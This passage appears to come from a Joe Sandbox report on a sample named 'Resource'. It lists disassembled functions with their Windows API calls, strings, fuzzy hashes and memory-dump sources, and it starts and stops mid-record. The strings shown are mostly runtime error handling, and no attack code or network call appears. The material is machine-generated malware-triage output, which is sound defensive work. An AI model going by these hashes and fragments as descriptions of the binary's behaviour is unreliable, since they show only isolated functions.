                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17317E33A29A9285EB20DB21EA553F96360FF887C4F444135EA4E8BB59DF3ED105C706
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A8560: GetLastError.KERNEL32(00000000,00007FF6E60A2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8587
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A8560: FormatMessageW.KERNEL32 ref: 00007FF6E60A85B6
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A
                                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6E60A2AF0
                                                                                                                                                                                                                                                              • MessageBoxA.USER32 ref: 00007FF6E60A2B0C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                              • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                              • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                              • Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                              • Instruction ID: c7a02c68a5086f03a932bf2d7a3f74d070ca6d76faf3c09c9c8dece56d81aa26
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B31A37363869281E630DB10E5507EA6364FF847C4F404136EA8D87A99DF3ED305CB49
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                              • Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                              • Instruction ID: 8cbe82cc40824a616eab7e24fb4be16bf533432ba98039b032c78b454c61bc15
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF06262A3971282FB108B24E5483795360EF48761F640335CA6E8A1F4CF3FE484C75A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                                              • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                              • Instruction ID: f40bfc571d0ea7eeaeb2cc5c959172ce09b715c7121c2bf6291d51a318435e3f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2115E73E3CA2301F6541168EB9637914806F99374E080A34E96F9E7DACE2FA840422E
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB96F
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB98E
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9B6
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9C7
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BB9D8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                                              • Opcode ID: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                                                                                                                                                                                                                              • Instruction ID: 42b3f00f249ab922aa01e7321dfcc66015e15eb72fd03adbfe9b4b0f656a2962
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B117F22B2826242FA589726A7513796141AF547B0F04D334E97DC67CEDF2FF441860B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                                              • Opcode ID: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                                                                                                                                                                                                                              • Instruction ID: a0bff487ceb23b48d1b7ae40af0340c1b7417ad0874fb5562c068c528014bf6f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA112722E2922747F96867315B1537A22819F44370E58DB38D93ECA2DBDE6FB401860F
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                              • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                              • Instruction ID: fbcbba0c8cc8450d6faa9ce5a0da6526a5a75965ed9b2ae7eac7a526535b2d2f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C891AE33A38E6685E7218A25D65037D37A0AB40B58F448136DA5E873DDDE3FE845830A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                              • Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                              • Instruction ID: 8d0cd467d598c787a33f683f6f2c55af6b392d787fe1703bc7b78d5062c31d92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5681C633D2862285F7694F29C3103783690AB10B84F558134DA4BDF295CF2FE645EB6B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                              • Instruction ID: 2e50b9a4492f2c018d0ce77a3adc43220840155ce2ce4947e5e6ed3f73dae56d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4619933A28B558AE7208F65D5803AD7BA0FB48BC8F045225EF4D57B99DF3AE084C705
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                              • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                              • Instruction ID: edcf54eaf652b9bb6f68b3d29d21221330ac8ae9be726b28f4a41d8f028298b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8751AF3392829286EB648F21924436977A1EB44BC4F149235DB9DC7BD5CF3FE490CB0A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                              • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                              • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                              • Instruction ID: 8220134a26a84c945a4bffe7af3c91baee5d6cc086ea81d2e26b4d58fdbff238
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4531A67363869181E630EB10E5517EA6364FF847C4F804036E68D87A99DF3ED305CB49
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A3EF1
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                              • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                              • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                              • Instruction ID: e05d1e4739908cc18ce0397d885a73af555ce0db2f2ad4c39d6b5a98f8ca49ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4401DF73B3D7A281FA649720EA153B51260AF187C4F840436E84ECA692EE1FE105871A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                                              • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                              • Instruction ID: 6838a61f534636dc254b4683f33ca2cbcb1f1f0b3a65400cfa5f95ab94e2b142
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D11273B28A9189E750CF75D6402AC37B1FB54BD8B148236DE5E97B89DE3AD406C308
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                                              • Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                                                                                                                                                                                                                              • Instruction ID: 33c677f7025c2a31be59b1d04d1bb4766c21048fb1d3d62c49fc354d2b1d2aa2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E851A263A287518AF711DF70D6503BD33A1EB48B98F208535DE4D8B68EDF3AD4818716
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
